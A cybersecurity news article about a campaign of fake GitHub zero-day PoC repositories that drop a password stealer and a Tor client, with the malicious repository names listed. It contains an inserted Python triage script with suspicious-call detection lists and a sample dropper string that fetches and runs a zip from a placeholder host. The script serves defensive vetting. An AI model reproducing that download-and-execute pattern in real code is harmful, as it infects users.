
Fake Github PoCs are spreading Windows and Linux malware

by Yadullah Abidi | 3 min read

Hackers are now impersonating security researchers on GitHub to spread fake zero-day proof-of-concept (PoC) exploits that infect Windows and Linux machines. The fake profiles claim to belong to a company named “High Sierra Cyber Security” and promote its bogus PoC repositories on GitHub.

VulnCheck, which discovered the campaign, reports that it has been active since at least May 2023. The fake exploits are presented as PoCs for zero-day vulnerabilities in popular consumer software like Chrome, Discord, Signal, Microsoft Exchange and WhatsApp.

One of the fake Github profiles discovered by VulnCheck. | Source: VulnCheck

The profiles appear legitimate, complete with pictures of real security researchers from firms like Rapid7. The profiles are also linked to social media accounts such as Twitter, presumably adding another layer of legitimacy to these otherwise bogus GitHub profiles.

Regardless, every profile contains malicious repositories with a Python script named poc.py that downloads the malware which then gets installed on the target system. The script starts by downloading a zip archive from an external URL chosen according to the user’s operating system: cveswindows.zip for Windows and cveslinux.zip for Linux.

Once the zip file is downloaded, the malware is stashed in the OS’s temporary storage before being extracted and executed. These directories are %temp% on Windows and /home/[username]/.local/share on Linux.
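As an added example (not code from the article or from VulnCheck), the following Python triage script parses, without ever executing it, a PoC such as the poc.py described above and reports which steps of that fingerprint-the-OS / download / stage / execute chain it contains, so a script can be vetted before anyone runs it. The embedded sample PoC, its `.invalid` placeholder URL and the lists of suspicious call names are constructed assumptions, not values from the campaign.

```python
import ast

# Dotted names for each step of the dropper chain the article describes: fingerprint OS, fetch zip, stage it, run it.
SUSPICIOUS = {
    "os_fingerprint": {"platform.system", "os.name", "sys.platform"},
    "download": {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"},
    "archive": {"zipfile.ZipFile", "extractall", "shutil.unpack_archive"},
    "staging_dir": {"tempfile.gettempdir", "tempfile.mkdtemp"},
    "execute": {"subprocess.run", "subprocess.Popen", "subprocess.call", "os.system", "os.startfile"},
}
STAGING_MARKERS = ("%temp%", "/tmp", ".local/share", "appdata")  # paths named in the article

def _dotted(node):
    """Return 'pkg.mod.attr' for a plain attribute chain, '' otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else ""

def triage_poc(source):
    """Parse (never execute) a PoC and list the dropper steps it contains."""
    hits = {category: [] for category in SUSPICIOUS}
    hits["indicators"] = []  # URLs and archive names to vet before running anything
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute):
            for name in (_dotted(node), node.attr):  # full chain or bare method name
                for category, names in SUSPICIOUS.items():
                    if name in names and name not in hits[category]:
                        hits[category].append(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.lower()
            if text.startswith("http") or text.endswith(".zip"):
                hits["indicators"].append(node.value)
            if any(marker in text for marker in STAGING_MARKERS):
                hits["staging_dir"].append(node.value)
    return hits

def is_dropper_like(hits):
    return bool(hits["download"]) and bool(hits["execute"])  # fetch-then-run is the tell

# Constructed sample mirroring the article's poc.py: placeholder URL, parsed only, never run.
SAMPLE_POC = '''
import platform, tempfile, zipfile, subprocess, urllib.request
name = "cveswindows.zip" if platform.system() == "Windows" else "cveslinux.zip"
dst = tempfile.gettempdir() + "/" + name
urllib.request.urlretrieve("http://EXAMPLE-PLACEHOLDER.invalid/" + name, dst)
zipfile.ZipFile(dst).extractall(tempfile.gettempdir())
subprocess.run([dst[:-4]])
'''
```

A genuine PoC that only talks to its target (an HTTP request and a printed response) trips the download category at most, not the execute one, so `is_dropper_like` stays false for it; the per-category lists tell a reviewer exactly which lines to read before deciding.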

A fake Discord zero-day exploit PoC. | Source: VulnCheck

We don’t yet know exactly what kind of malware the malicious zip files install, but VulnCheck reports that both executables install a Tor client, with the Windows version also including a password-stealing trojan. Luckily, the Windows malware is quickly detected, as over 60% of antivirus engines on VirusTotal identify its suspicious behaviour. Conversely, the Linux version is harder to detect, with only three antivirus engines picking up signs of malicious activity.

The threat actors behind the campaign are also unknown, but they seem persistent, creating new profiles and repositories every time existing ones get flagged and deleted. We also don’t know the real-world impact of the campaign just yet. 

Overall, at the time of writing, the threat actors have the following seven malicious repositories on GitHub, which you shouldn’t touch with a ten-foot pole.

  • github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
  • github.com/BAdithyaHSCS/Exchange-0-Day
  • github.com/DLandonHSCS/Discord-RCE
  • github.com/GSandersonHSCS/discord-0-day-fix
  • github.com/MHadzicHSCS/Chrome-0-day
  • github.com/RShahHSCS/Discord-0-Day-Exploit
  • github.com/SsankkarHSCS/Chromium-0-Day

In addition, several Twitter accounts have been created to lend more legitimacy to the fake profiles. These include:

  • twitter.com/AKuzmanHSCS
  • twitter.com/DLandonHSCS
  • twitter.com/GSandersonHSCS
  • twitter.com/MHadzicHSCS


Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.